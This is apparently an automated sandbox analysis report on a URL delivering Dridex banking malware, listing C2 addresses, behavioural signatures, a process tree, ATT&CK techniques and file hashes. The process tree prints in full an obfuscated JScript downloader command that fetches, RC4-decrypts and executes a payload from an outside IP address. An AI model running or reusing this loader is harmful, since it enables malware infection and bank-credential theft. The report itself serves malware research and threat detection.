Analysis

  • max time kernel
    68s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-03-2021 05:04

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    210309-zhdmcx9mws

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

188.165.17.91:8443

210.65.244.186:6601

rc4.plain

Signatures

  • Dridex

    Dridex (also known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Dridex Loader 2 IoCs

    Detects both the x86 and x64 Dridex loader in memory.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1020
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1020 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinH"+"ttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c 97cdn.exe
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\97cdn.exe
              97cdn.exe
              6⤵
              • Executes dropped EXE
              PID:2004

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry (T1112), 1 signature
  • Discovery: System Information Discovery (T1082), 1 signature


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    a4bb59c8de49cba4e45264c4291a5e62

    SHA1

    714a845dbe43fe4b8986d90e71416a375e88fec1

    SHA256

    9e27abaae05890b0c15b01233d7667917912b67fd6aa04aea41a71dfc788aeb0

    SHA512

    7829cd1bf077bcc7cf55e2bdb26d7fb4ffbfa7831ee2cb86faf7393637ba1e611fb0f845fba688d8d4c5e5d520d036da442d8f7af4121c8f475f9c17373f6e99

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    f4aad291df4a89703ec916807efe4351

    SHA1

    32a9c9b620196535122c02058169c84653c70cf1

    SHA256

    460bd8959415a67455b88baf4dcb180cbb5894edb10b776b034fcb9085f2aeef

    SHA512

    6444e945cc80c09170a92937761383f7dc2c07173a82d8ac27044765b85581b9180050dc7b128a7a9c17f412581e4b50272113d2036cfa01936761ba5a80c28d

  • C:\Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KWROTH2.txt
    MD5

    e245831150a9e822fd35a00c1af79849

    SHA1

    6cf7cc634e6e670e461af5aa91af212f47e8b980

    SHA256

    e2584d753253bc18399f270a13073e2e7963589a6762eeaf61852927bb58295f

    SHA512

    ce7b3a7491c7f22da7efcbf5779deac6b6ba66ff50e309aba3f8eda694bc4fa68d8d069fa197351e7c1ceda020cfe4aeabc8491f658404ac73687418b77cf208

  • \Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

  • memory/748-4-0x0000000000000000-mapping.dmp
  • memory/920-9-0x00000000026D0000-0x00000000026D4000-memory.dmp
    Filesize

    16KB

  • memory/920-7-0x00000000753E1000-0x00000000753E3000-memory.dmp
    Filesize

    8KB

  • memory/920-5-0x0000000000000000-mapping.dmp
  • memory/1276-2-0x000007FEF5BD0000-0x000007FEF5E4A000-memory.dmp
    Filesize

    2.5MB

  • memory/1592-8-0x0000000000000000-mapping.dmp
  • memory/1972-3-0x0000000000000000-mapping.dmp
  • memory/2004-13-0x0000000000000000-mapping.dmp
  • memory/2004-16-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

  • memory/2004-17-0x0000000000220000-0x000000000025C000-memory.dmp
    Filesize

    240KB

  • memory/2004-18-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB